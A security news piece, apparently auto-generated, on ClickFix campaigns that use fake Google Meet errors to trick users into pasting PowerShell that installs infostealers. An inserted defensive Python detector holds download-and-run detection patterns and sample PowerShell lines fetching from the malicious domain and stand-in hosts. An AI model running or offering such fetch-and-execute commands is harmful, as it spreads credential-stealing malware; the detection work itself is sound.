

Ethical Hacking News

Fake Google Meet Conference Errors Push Infostealing Malware: The Rise of ClickFix Campaigns



Infostealing malware is on the rise, with fake Google Meet conference errors being used to deliver malicious payloads. ClickFix campaigns have become increasingly sophisticated, using phishing emails, fake Facebook pages, and deceptive GitHub issues to trick victims into downloading infostealing malware. Stay safe online by being aware of these risks and taking steps to protect yourself.

  • Malicious actors use fake Google Meet conference errors to deliver infostealing malware in "ClickFix" campaigns.
  • The scams have evolved since May, using phishing emails, fake Facebook pages, and deceptive GitHub issues to trick victims into downloading malware.
  • The threat actors impersonate legitimate services like Google Chrome, Microsoft Word, and OneDrive to gain trust.
  • ClickFix campaigns have increased in frequency, targeting the US and Japan, with fake Google Meet pages being used as lures.
  • The malware fetches its payload from 'googiedrivers.com', delivering infostealing malware like Stealc or Rhadamanthys for Windows, and AMOS Stealer for macOS.



    Malicious actors are using fake Google Meet conference errors to deliver infostealing malware, part of a growing trend dubbed "ClickFix" campaigns. These scams have evolved significantly since their emergence in May and now use tactics such as phishing emails, fake Facebook pages, and deceptive GitHub issues to trick victims into downloading the malware.

    Proofpoint first reported the ClickFix campaigns in May, when it observed a threat actor (TA571) using social-engineering tactics to impersonate errors for Google Chrome, Microsoft Word, and OneDrive. The scam prompts the victim to copy and paste a piece of PowerShell code that supposedly fixes the issue but instead infects their computer with malware.

    Since then, ClickFix campaigns have become more frequent, especially in the United States and Japan. In July, McAfee reported an increase in these campaigns, which now use fake Google Meet pages to lure victims into downloading the malware. The fake pages appear to be legitimate Google Meet links, complete with domain names that closely resemble actual Google Meet URLs.

    The threat actors behind the ClickFix campaigns use a variety of tactics to trick victims, including phishing emails and fake Facebook pages. They also use deceptive GitHub issues to create the illusion of a legitimate issue report. Once the victim clicks on the link or downloads the malware, a piece of PowerShell code runs and fetches the payload from the 'googiedrivers.com' domain.
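
One way to hunt for this behaviour in process-creation telemetry, added here as an example and not code from the article or the vendors it cites. The event field names, the score weights, the list of interactive parent processes and the sample events are assumptions of this example; only the domain 'googiedrivers.com' comes from the article.

```python
import re

PAYLOAD_DOMAINS = {"googiedrivers.com"}  # the one indicator named in the article
SHELLS = {"powershell.exe", "pwsh.exe"}
# Assumption: a pasted command is started from an interactive parent process.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe"}
FETCH = re.compile(r"\b(invoke-webrequest|iwr|invoke-restmethod|irm|"
                   r"downloadstring|downloadfile|start-bitstransfer)\b", re.I)
RUN = re.compile(r"\b(invoke-expression|iex|start-process)\b", re.I)
HOST = re.compile(r"https?://([a-z0-9.-]+)", re.I)

def _name(path):
    """Lower-cased file name of a Windows or POSIX style path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def score_event(ev):
    """Score one process-creation event; returns (score, reasons)."""
    if _name(ev["image"]) not in SHELLS:
        return 0, []
    cmd, score, reasons = ev["command_line"], 0, []
    hosts = {h.lower().rstrip(".") for h in HOST.findall(cmd)}
    if any(h == d or h.endswith("." + d) for h in hosts for d in PAYLOAD_DOMAINS):
        score += 5
        reasons.append("payload domain from the article")
    if FETCH.search(cmd) and RUN.search(cmd):
        score += 3
        reasons.append("download-and-run in one command")
    # The parent only adds weight to an already suspicious command line.
    if score and _name(ev["parent_image"]) in INTERACTIVE_PARENTS:
        score += 1
        reasons.append("interactive parent")
    return score, reasons

def triage(events, threshold=4):
    """Return (host, score, reasons) for events at or above the threshold."""
    scored = ((ev["host"], *score_event(ev)) for ev in events)
    return [hit for hit in scored if hit[1] >= threshold]

# Constructed sample events (not real telemetry).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE = [
    {"host": "ws-01", "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell iwr https://googiedrivers.com/CONSTRUCTED -OutFile x"},
    {"host": "ws-02", "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell -c "iex (irm https://files.example.test/CONSTRUCTED)"'},
    {"host": "ws-03", "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell Get-ChildItem C:\Temp"},
    {"host": "ws-04", "image": PS, "parent_image": r"C:\Program Files\Agent\agent.exe",
     "command_line": "powershell iwr https://updates.example.test/a.msi -OutFile a.msi; Start-Process a.msi"},
]
```

With the default threshold, `triage(SAMPLE)` flags ws-01 and ws-02; ws-04 scores 3 because its download-and-run command comes from a non-interactive parent, which is the trade-off the threshold controls.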

    The final payloads are infostealing malware such as Stealc or Rhadamanthys for Windows, and AMOS Stealer for macOS. These malware samples have been identified by Sekoia, a SaaS cybersecurity provider, which notes that the ClickFix campaigns have evolved significantly since their initial emergence.

    In addition to Google Meet, ClickFix campaigns have also used other baits such as Zoom, PDF readers, fake video games, web3 browsers and projects, and messenger apps. This suggests that the threat actors are diversifying their tactics and using a variety of lures to trick victims into downloading the malware.

    The ClickFix campaigns are just one example of the growing number of scams and cyber threats that are targeting individuals and businesses. As technology continues to evolve, it's essential for users to be aware of these risks and take steps to protect themselves.



    Related Information:

  • https://www.bleepingcomputer.com/news/security/fake-google-meet-conference-errors-push-infostealing-malware/

  • https://any.run/malware-trends/rhadamanthys

  • https://research.checkpoint.com/2023/rhadamanthys-the-everything-bagel-infostealer/

  • https://thehackernews.com/2023/04/new-atomic-macos-stealer-can-steal-your.html

  • https://medium.com/@cyberhust1er/silent-echoes-the-hidden-dialogue-among-malware-entities-spotlight-on-amos-infostealer-6d7cd70e3219


  • Published: Thu Oct 17 17:07:40 2024 by llama3.2 3B Q4_K_M













         

